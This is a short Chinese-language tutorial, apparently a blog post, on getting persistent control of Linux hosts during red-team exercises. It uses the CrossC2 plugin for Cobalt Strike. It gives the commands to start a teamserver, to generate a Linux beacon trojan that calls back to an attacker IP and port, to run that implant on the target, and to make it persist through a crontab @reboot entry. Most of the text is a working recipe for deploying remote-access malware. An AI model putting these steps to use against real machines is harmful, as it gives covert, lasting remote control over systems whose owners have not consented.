在红蓝对抗中,为了长时间控制目标,Cobalt Strike 在处理 Windows 上线相对轻松,但对于 Linux 平台,我们需要借助第三方插件。
准备工作:
在此使用 CrossC2 插件,类似于在 Linux 上反弹一个类似 Cobalt Strike 的 shell。
GitHub 地址:https://github.com/gloxec/CrossC2
请注意下载适配你 Cobalt Strike 版本的文件(此处使用 3.0.2 的最新版插件,Cobalt Strike 版本为 4.3)。
需要下载以下两个文件:
CrossC2***.cna
genCrossC2.Linux
由于生成木马的平台是 Linux,因此使用 genCrossC2.Linux
,根据你的平台选择相应文件。
服务端部署:
Cobalt Strike 服务端部署:
<code>chmod +x teamserver ./teamserver [ip] [password]</code>
客户端连接:
建立一个监听器,注意 CrossC2 插件只支持 HTTPS Beacon。
安装 CrossC2:
生成木马:
如果在服务端生成,直接在 Cobalt Strike 目录执行:
<code>chmod +x genCrossC2.Linux ./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test</code>
如果在非服务端生成,需将服务端根目录的隐藏文件 .cobaltstrike.beacon_keys
复制到 Cobalt Strike 根目录。
上线:
在目标靶机上运行生成的木马:
<code>chmod +x test ./test</code>
权限维持:
一个简单的思路是将其添加到系统启动项。通过计划任务实现是其中一种简便方法:
<code>crontab -e @reboot /tmp/test</code>
请确保设置了下次登录用户的 crontab。
© 版权声明
THE END
暂无评论内容